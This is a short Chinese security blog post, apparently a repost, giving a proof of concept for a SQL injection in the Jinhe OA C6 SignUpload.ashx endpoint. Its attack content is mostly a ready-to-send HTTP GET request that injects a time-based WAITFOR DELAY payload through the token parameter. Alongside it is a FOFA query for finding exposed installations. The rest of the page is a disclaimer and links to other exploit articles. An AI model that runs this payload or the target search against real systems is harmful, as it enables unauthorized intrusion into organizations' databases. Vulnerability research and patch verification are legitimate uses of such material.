金和OA C6 SignUpload SQL注入漏洞复现及POC

2024年9月27日11:22:16评论115 views字数 374阅读1分14秒阅读模式

FOFA

app="金和网络-金和OA"

漏洞复现

POC

GET /C6/Jhsoft.Web.ask/SignUpload.ashx?token=1%3BWAITFOR+DELAY+%270%3A0%3A%205%27+--%20and%201=1_123_123&filename=1 HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537Accept-Encoding: gzipConnection: close

nuclei运行结果

金和OA C6 SignUpload SQL注入漏洞复现及POC

nuclei-poc已上传到知识星球

原文始发于微信公众号（CatalyzeSec）：金和OA C6 SignUpload SQL注入漏洞复现及POC

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

CVE-2025-24071：通过 RAR/ZIP 提取和 .library-ms 文件泄露 NTLM 哈希值

Kibana 原型污染导致执行任意代码漏洞（CVE-2025-25014）

WordPress depicter插件SQL注入漏洞（CVE-2025-2011）

Kibana 原型污染导致任意代码执行漏洞 (CVE-2025-25014)

用友NC ECFileManageServlet 反序列化RCE

PoC | 三星 MagicINFO 9 服务器中的漏洞 (CVE-2024-7399) 被利用

Apache Parquet Java 漏洞 CVE-2025-46762 使系统暴露于远程代码执行攻击

用友NC ncmsgservlet 反序列化RCE

用友NC jiuqisingleservlet 反序列化RCE

基于 LNK 快捷方式获取Windows NTLM的漏洞（无需运行，已复现！）

本文由 admin 发表于 2024年9月27日11:22:16
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
金和OA C6 SignUpload SQL注入漏洞复现及POChttps://cn-sec.com/archives/3213616.html
免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉.

金和OA C6 SignUpload SQL注入漏洞复现及POC

CVE-2025-24071：通过 RAR/ZIP 提取和 .library-ms 文件泄露 NTLM 哈希值

Kibana 原型污染导致执行任意代码漏洞（CVE-2025-25014）

WordPress depicter插件SQL注入漏洞（CVE-2025-2011）

Kibana 原型污染导致任意代码执行漏洞 (CVE-2025-25014)

用友NC ECFileManageServlet 反序列化RCE

PoC | 三星 MagicINFO 9 服务器中的漏洞 (CVE-2024-7399) 被利用

Apache Parquet Java 漏洞 CVE-2025-46762 使系统暴露于远程代码执行攻击

用友NC ncmsgservlet 反序列化RCE

用友NC jiuqisingleservlet 反序列化RCE

基于 LNK 快捷方式获取Windows NTLM的漏洞（无需运行，已复现！）

发表评论

在线咨询

微信